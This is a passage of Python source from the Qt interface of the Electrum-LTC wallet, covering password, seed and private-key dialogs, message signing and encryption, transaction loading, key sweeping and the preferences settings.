sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_ltc.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_ltc.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum_ltc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("litecoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_ltc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-ltc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_ltc.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(bool(self.config.get('show_fee', False)))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = bool(self.config.get('use_rbf', True))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(bool(self.config.get('batch_rbf', False)))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = repr(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 LTC = 1000 mLTC. 1 mLTC = 1000 uLTC. 1 uLTC = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_ltc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(bool(self.config.get('check_updates', False)))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
